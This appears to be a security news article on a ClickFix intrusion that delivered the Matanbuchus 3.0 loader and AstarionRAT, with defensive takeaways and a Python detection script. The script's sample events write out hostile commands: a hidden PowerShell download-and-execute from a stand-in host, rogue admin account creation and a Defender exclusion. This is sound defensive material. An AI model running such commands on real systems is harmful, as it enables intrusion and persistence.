PROBABLYPWNED
Malware · February 25, 2026 · 4 min read

Matanbuchus 3.0 Loader Delivers AstarionRAT in Hands-On Intrusion

Huntress responds to ClickFix intrusion deploying Matanbuchus 3.0 and custom AstarionRAT. Attackers achieved lateral movement within 40 minutes.

James Rivera

Huntress disclosed details of a hands-on-keyboard intrusion that began with a ClickFix infection and ended with attackers moving laterally across domain controllers within 40 minutes. The attack chain deployed Matanbuchus 3.0, a loader that returned after a year-long hiatus, and dropped a previously undocumented RAT the researchers dubbed AstarionRAT.

The incident response, published by Huntress this week, provides a detailed breakdown of how initial access through social engineering escalates to full network compromise when defenders don't intervene quickly.

ClickFix Continues to Work

The intrusion started with ClickFix, the social engineering technique that tricks users into executing malicious commands themselves. We've covered multiple ClickFix variants this month, and the technique remains effective because it bypasses browser and email security controls.

In this case, a fake security alert prompted the victim to copy and paste a command into the Windows Run dialog. That command triggered a PowerShell chain that ultimately installed Matanbuchus through a silent MSI deployment.

Silent MSI installations avoid user notification dialogs, letting malware install without visible prompts. The victim sees nothing unusual after pasting the initial command.

Matanbuchus Returns

Matanbuchus is a Malware-as-a-Service loader that went quiet around May 2025. Version 3.0 represents a complete code rewrite with expanded capabilities:

  • Support for running EXE, DLL, shellcode, and MSI payloads from disk or in memory
  • Reverse shell functionality via CMD and PowerShell
  • WQL query execution for system reconnaissance
  • High-quality screenshot capture
  • A morphing engine to maintain clean builds without crypters
  • Multiple delivery formats including MSI, EXE, DLL, ISO, and BIN

The subscription pricing reflects the tooling's sophistication: $10,000/month for the HTTPS version and $15,000/month for the DNS-based variant. Those prices put Matanbuchus in the premium tier of loader services, competing with tools typically reserved for ransomware operators and sophisticated threat groups.

AstarionRAT: A New Custom Implant

The most interesting element was the payload: a fully featured RAT that Huntress had never seen before. AstarionRAT supports 24 distinct commands:

  • SOCKS5 proxy for tunneling traffic through infected hosts
  • Credential theft targeting browsers and system stores
  • Reflective code loading to execute additional payloads in memory
  • Port scanning for internal network reconnaissance
  • Shell execution via CMD and PowerShell

The RAT uses RSA-encrypted command-and-control traffic disguised as application telemetry. This design helps the traffic blend with legitimate software beacon patterns, complicating network-based detection.

Rapid Lateral Movement

The operator returned the day after the initial infection. What happened next demonstrates why initial access is just the beginning:

Within 40 minutes, the attacker:

  • Moved laterally to a Windows Server
  • Compromised two domain controllers
  • Used PsExec for remote execution
  • Created rogue administrator accounts
  • Added Windows Defender exclusions to prevent detection

The speed suggests either automation, experience, or both. Once attackers have working credentials and a foothold, domain compromise doesn't require sophisticated techniques, just systematic execution.

Defensive Takeaways

This intrusion follows patterns we've tracked across ransomware deployments and financially motivated attacks. The combination of social engineering, commodity malware, and hands-on operation makes these threats difficult to prevent entirely.

Detection opportunities exist at multiple stages:

  1. ClickFix execution - Monitor for suspicious PowerShell launched from user-initiated commands
  2. Silent MSI installation - Alert on msiexec.exe with quiet installation flags
  3. Unusual scheduled tasks - Matanbuchus establishes persistence through scheduled tasks
  4. Lateral movement indicators - PsExec usage, remote service creation, new administrator accounts
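As an added illustration (not code from the Huntress report), here are the detection opportunities above written as predicates over process-creation events and run across a handful of constructed sample records. The field names, regular expressions and sample command lines are assumptions chosen to show the pattern, not indicators from the report.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation record (e.g. Sysmon Event ID 1 / Security 4688)."""
    parent: str
    image: str
    cmdline: str

def _match(pattern, text):
    return re.search(pattern, text, re.IGNORECASE) is not None

# Each rule corresponds to one detection opportunity from the list above.
RULES = {
    # 1. ClickFix: PowerShell spawned by the shell (Run dialog) with hidden/encoded/download switches.
    "clickfix_powershell": lambda e: e.parent.lower() == "explorer.exe" and e.image.lower() == "powershell.exe"
        and _match(r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|-nop\b|\biex\b|\biwr\b|downloadstring", e.cmdline),
    # 2. Silent MSI install: msiexec with a quiet/passive switch.
    "silent_msi": lambda e: e.image.lower() == "msiexec.exe" and _match(r"[/-](q[nb]?|quiet|passive)\b", e.cmdline),
    # 3. Persistence via scheduled task creation.
    "scheduled_task": lambda e: e.image.lower() == "schtasks.exe" and _match(r"/create\b", e.cmdline),
    # 4a. PsExec: the service binary it drops on the target, or the client itself.
    "psexec": lambda e: e.image.lower() in ("psexesvc.exe", "psexec.exe", "psexec64.exe"),
    # 4b. Rogue admin account: net user /add, or adding a user to the local administrators group.
    "rogue_admin": lambda e: e.image.lower() in ("net.exe", "net1.exe")
        and _match(r"\b(user\s+\S+\s+\S+\s+/add|localgroup\s+administrators\s+\S+\s+/add)", e.cmdline),
    # 4c. Defender exclusions added via PowerShell.
    "defender_exclusion": lambda e: _match(r"Add-MpPreference\b.*-Exclusion(Path|Process|Extension)", e.cmdline),
}

def detect(events):
    """Return (rule_name, cmdline) for every event that trips a rule."""
    return [(name, e.cmdline) for e in events for name, pred in RULES.items() if pred(e)]

# Constructed sample events; paths and names are illustrative, not IoCs from the report.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe", 'powershell -w hidden -nop -c "iwr http://example.invalid/a | iex"'),
    ProcEvent("powershell.exe", "msiexec.exe", r"msiexec /i C:\Users\Public\update.msi /qn"),
    ProcEvent("msiexec.exe", "schtasks.exe", r"schtasks /create /tn Updater /tr C:\Users\Public\u.exe /sc minute /mo 5"),
    ProcEvent("services.exe", "PSEXESVC.exe", r"C:\Windows\PSEXESVC.exe"),
    ProcEvent("cmd.exe", "net.exe", "net user svc_backup Passw0rd /add"),
    ProcEvent("cmd.exe", "net.exe", "net localgroup administrators svc_backup /add"),
    ProcEvent("cmd.exe", "powershell.exe", r"powershell Add-MpPreference -ExclusionPath C:\Users\Public"),
    ProcEvent("explorer.exe", "notepad.exe", r"notepad.exe C:\notes.txt"),       # benign
    ProcEvent("svchost.exe", "msiexec.exe", r"msiexec /i C:\Temp\vendor.msi"),   # interactive install, benign
]

if __name__ == "__main__":
    for name, cmd in detect(SAMPLE_EVENTS):
        print(f"{name:20s} {cmd}")
```

The two benign records at the end are there to show the rules do not fire on an interactive MSI install or an ordinary shell-launched process.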

Organizations running endpoint detection should review whether their tools catch the specific behavioral patterns described. The Huntress report includes IOCs and detection signatures for those wanting to validate coverage.

For teams still struggling with ClickFix-style attacks, the fundamental defense remains user education. No technical control stops a user who willingly executes malicious commands. Training users to recognize social engineering prompts, however convincing they appear, remains the primary countermeasure.
